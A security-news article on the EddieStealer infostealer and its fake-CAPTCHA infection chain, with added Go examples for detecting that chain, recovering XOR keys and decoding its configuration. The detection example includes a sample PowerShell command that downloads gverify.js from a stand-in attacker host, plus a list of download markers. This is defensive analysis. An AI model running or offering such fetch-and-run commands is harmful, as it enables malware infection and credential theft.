By Abdul Wasay ⏐ 6 months ago ⏐ 3 min read
EddieStealer Malware Exploits Fake CAPTCHAs To Steal Credentials

Elastic Security Labs has uncovered a new Rust-based infostealer named EddieStealer, which employs deceptive CAPTCHA pages to trick users into executing malicious scripts, leading to credential theft and data exfiltration.

EddieStealer Deceptive CAPTCHA Strategy

EddieStealer is disseminated through adversary-controlled web domains that present fake CAPTCHA interfaces mimicking legitimate verification systems. These fraudulent CAPTCHAs display prompts like “Verify you are a human” or “I’m not a robot,” seamlessly blending into compromised websites or phishing campaigns to deceive unsuspecting users.

Infection Mechanism

The initial infection vector involves compromised websites hosting an obfuscated React-based JavaScript payload. This payload presents a counterfeit “I’m not a robot” page. When users interact with this interface, a malicious PowerShell command is copied to their clipboard using the document.execCommand("copy") method. Users are then instructed to open the Windows Run dialog, paste the command, and execute it. This action silently downloads a second-stage payload, gverify.js, from attacker infrastructure.

The gverify.js script, another obfuscated JavaScript file, fetches and saves the main EddieStealer executable from the attacker domain, storing it in the user’s Downloads folder with a pseudorandom name. The malware is then executed in a hidden window using cscript, avoiding visible signs of activity to the infected user.
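
Seen from the endpoint, the chain above leaves a distinctive pair of process relationships: PowerShell started by the desktop shell (what a command pasted into the Run dialog looks like) that fetches remote content, followed by a Windows script host started by that PowerShell. The Go program below is an added example, not code from this article or from Elastic's report: it runs two such rules over a constructed set of process-creation events. The event shape, the rule names, the download markers and the sample command lines are all assumptions chosen for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a constructed, simplified process-creation record. The field set is an
// assumption for this example; real telemetry (e.g. Sysmon Event ID 1) carries far more.
type ProcEvent struct {
	Image       string
	ParentImage string
	CommandLine string
}

// Alert names the rule that fired and the event that triggered it.
type Alert struct {
	Rule  string
	Event ProcEvent
}

// baseName lower-cases the file-name component of a Windows path.
func baseName(path string) string {
	i := strings.LastIndexAny(path, `\/`)
	return strings.ToLower(path[i+1:])
}

// Substrings that usually mean "fetch something from the network" in a PowerShell
// command line; a constructed, deliberately short list.
var downloadMarkers = []string{"http://", "https://", "downloadstring", "invoke-webrequest", "iwr ", "curl "}

func containsAny(s string, subs []string) bool {
	for _, sub := range subs {
		if strings.Contains(s, sub) {
			return true
		}
	}
	return false
}

// DetectClickFixChain checks each event against the two stages the article describes:
//  1. powershell.exe spawned directly by explorer.exe (a command pasted into the Run
//     dialog runs under the shell) with a command line that fetches remote content;
//  2. cscript.exe or wscript.exe spawned by powershell.exe to run a .js file.
func DetectClickFixChain(events []ProcEvent) []Alert {
	var alerts []Alert
	for _, e := range events {
		img, parent := baseName(e.Image), baseName(e.ParentImage)
		cmd := strings.ToLower(e.CommandLine)
		switch {
		case img == "powershell.exe" && parent == "explorer.exe" && containsAny(cmd, downloadMarkers):
			alerts = append(alerts, Alert{"powershell_from_explorer_with_download", e})
		case (img == "cscript.exe" || img == "wscript.exe") && parent == "powershell.exe" &&
			strings.Contains(cmd, ".js"):
			alerts = append(alerts, Alert{"script_host_spawned_by_powershell", e})
		}
	}
	return alerts
}

// SampleEvents is a constructed sequence: two events matching the chain, two benign ones.
func SampleEvents() []ProcEvent {
	return []ProcEvent{
		{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\explorer.exe`,
			`powershell -w hidden -c "iwr https://attacker.invalid/gverify.js -OutFile $env:TEMP\gverify.js"`},
		{`C:\Windows\System32\cscript.exe`, `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`,
			`cscript.exe //nologo C:\Users\alice\AppData\Local\Temp\gverify.js`},
		{`C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `C:\Windows\explorer.exe`,
			`powershell -NoProfile -File C:\Scripts\backup.ps1`},
		{`C:\Windows\System32\cscript.exe`, `C:\Windows\System32\cmd.exe`,
			`cscript.exe C:\Scripts\inventory.js`},
	}
}

func main() {
	for _, a := range DetectClickFixChain(SampleEvents()) {
		fmt.Printf("[%s] %s\n", a.Rule, a.Event.CommandLine)
	}
}
```

The parent-child relationship carries most of the signal here: administrators rarely launch a downloading PowerShell straight from explorer.exe, and PowerShell rarely hands work to cscript.exe, so both rules stay quiet on the two benign events while firing on the two staged ones.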

Advanced Evasion Techniques

Written in Rust, EddieStealer leverages the language’s features for enhanced stealth and resilience against traditional analysis workflows. Critical strings within the malware are encrypted using a simple XOR cipher, with each decryption requiring a dedicated key derivation function and inline decryption at runtime. Additionally, the malware employs several obfuscation and anti-analysis techniques, including stripped symbols and the use of tools like rustbinsign for Rust signature generation, complicating static analysis.
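
Because the encrypted strings are XOR-protected, an analyst who can guess the start of one plaintext (a URL scheme, a drive letter) can recover the key and decrypt the rest of the string. The Go program below is an added example, not code from this article or from Elastic's report, and it says nothing about how EddieStealer actually derives its keys: it demonstrates the generic known-plaintext recovery of a repeating XOR key over a constructed sample string, with the key length, the sample key and the sample plaintext all chosen for illustration.

```go
package main

import "fmt"

// XorDecrypt applies a repeating-key XOR; the same routine encrypts and decrypts.
func XorDecrypt(ct, key []byte) []byte {
	out := make([]byte, len(ct))
	for i, b := range ct {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// RecoverKey derives a repeating XOR key of length keyLen from a crib: a plaintext
// prefix the analyst expects, such as "https://". It returns false when the crib is
// shorter than the key or when crib bytes beyond keyLen contradict the derived key,
// which is how a wrong keyLen guess is rejected.
func RecoverKey(ct, crib []byte, keyLen int) ([]byte, bool) {
	if keyLen <= 0 || len(crib) < keyLen || len(ct) < len(crib) {
		return nil, false
	}
	key := make([]byte, keyLen)
	for i := 0; i < keyLen; i++ {
		key[i] = ct[i] ^ crib[i]
	}
	for i := keyLen; i < len(crib); i++ {
		if ct[i]^key[i%keyLen] != crib[i] {
			return nil, false
		}
	}
	return key, true
}

// LooksPrintable is a cheap sanity check for a candidate decryption.
func LooksPrintable(b []byte) bool {
	if len(b) == 0 {
		return false
	}
	for _, c := range b {
		if c < 0x20 || c > 0x7e {
			return false
		}
	}
	return true
}

// sampleKey is a constructed 4-byte key, not a value from any real sample.
var sampleKey = []byte{0x5a, 0x13, 0xc4, 0x7e}

// SampleEncrypted returns a constructed encrypted string standing in for one entry of
// a malware string table; the plaintext is a placeholder URL.
func SampleEncrypted() []byte {
	return XorDecrypt([]byte("https://c2.example.invalid/gate"), sampleKey)
}

func main() {
	ct := SampleEncrypted()
	for keyLen := 1; keyLen <= 8; keyLen++ {
		if key, ok := RecoverKey(ct, []byte("https://"), keyLen); ok {
			pt := XorDecrypt(ct, key)
			fmt.Printf("keyLen=%d key=%x printable=%v plaintext=%q\n", keyLen, key, LooksPrintable(pt), pt)
		}
	}
}
```

Iterating over candidate key lengths and keeping only those where the crib stays self-consistent is enough for short keys; for a binary with per-string key derivation, the same loop would simply be run once per encrypted string.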

EddieStealer also incorporates sandbox evasion strategies. It checks for at least 4.0 GB of available system memory and will self-delete if this threshold is not met. The self-deletion process uses NTFS Alternate Data Streams renaming to bypass file locks, a technique observed in other malware families.

EddieStealer Data Exfiltration Capabilities

Upon execution, EddieStealer decrypts configuration data and communicates with its command-and-control (C2) server via HTTP. The configuration, received in AES-CBC-encrypted and Base64-encoded form, contains a session ID, a list of exfiltration tasks, communication keys, and a self-delete flag.
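
A configuration delivered as Base64-wrapped AES-CBC is something an analyst typically reimplements as a small decoder once the key is recovered. The Go program below is an added example, not code from this article or from Elastic's report: it decodes and decrypts a constructed blob into the four fields the article lists, validating the length, the PKCS#7 padding and the JSON at each step. The JSON key names, the IV-prefixed layout, the AES-256 key size and the sample key and IV are all assumptions for the example, not EddieStealer's actual format.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
)

// StealerConfig holds the fields the article lists. Field names are assumptions.
type StealerConfig struct {
	SessionID  string   `json:"session_id"`
	Tasks      []string `json:"tasks"`
	Keys       []string `json:"keys"`
	SelfDelete bool     `json:"self_delete"`
}

// DecryptConfig reverses the assumed transport encoding:
// Base64 -> [IV || AES-CBC ciphertext] -> PKCS#7 unpadding -> JSON.
// Each step validates its input so a truncated blob or wrong key is reported
// rather than silently parsed as garbage.
func DecryptConfig(b64 string, key []byte) (*StealerConfig, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, fmt.Errorf("base64: %w", err)
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not IV plus whole AES blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	if pt, err = pkcs7Unpad(pt); err != nil {
		return nil, err
	}
	var cfg StealerConfig
	if err := json.Unmarshal(pt, &cfg); err != nil {
		return nil, fmt.Errorf("config is not JSON (wrong key?): %w", err)
	}
	return &cfg, nil
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("empty plaintext")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("invalid PKCS#7 padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid PKCS#7 padding")
		}
	}
	return b[:len(b)-n], nil
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	for i := 0; i < n; i++ {
		b = append(b, byte(n))
	}
	return b
}

// EncryptSample builds a blob in the assumed layout so the decoder can be exercised
// offline; it is the constructed stand-in for a real C2 response.
func EncryptSample(cfg StealerConfig, key, iv []byte) (string, error) {
	pt, err := json.Marshal(cfg)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	padded := pkcs7Pad(pt)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	out := append([]byte{}, iv...) // copy so the caller's IV slice is never mutated
	return base64.StdEncoding.EncodeToString(append(out, ct...)), nil
}

// SampleKey and SampleIV are constructed values, not material from any real sample.
func SampleKey() []byte { return []byte("0123456789abcdef0123456789abcdef") } // 32 bytes: AES-256
func SampleIV() []byte  { return []byte("fedcba9876543210") }                 // 16 bytes

func main() {
	in := StealerConfig{SessionID: "sess-constructed-01", Tasks: []string{"browsers", "wallets"},
		Keys: []string{"comm-key-placeholder"}, SelfDelete: true}
	blob, _ := EncryptSample(in, SampleKey(), SampleIV())
	cfg, err := DecryptConfig(blob, SampleKey())
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Printf("session=%s tasks=%v self_delete=%v\n", cfg.SessionID, cfg.Tasks, cfg.SelfDelete)
}
```

The self-delete flag is worth surfacing explicitly when triaging: a configuration that sets it tells the responder that the binary may already be gone from disk and that memory or telemetry, not the file system, is where the evidence will be.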

EddieStealer targets a wide range of sensitive data, including credentials, browser data, cryptocurrency wallet information, and details from password managers, messaging applications, and FTP clients. The specific targets and files are defined by the remote C2 server and can be adjusted by operators.

Implications and Recommendations

EddieStealer’s emergence shows the evolving tactics of cybercriminals, particularly their use of deceptive interfaces and advanced programming languages like Rust to enhance malware stealth and effectiveness. Users should exercise caution when encountering CAPTCHA prompts, especially those that require unusual actions like copying and executing commands.

Organizations must implement robust security measures, including up-to-date antivirus solutions, employee training on phishing tactics, and monitoring for unusual system behaviors, to mitigate the risks posed by such sophisticated threats.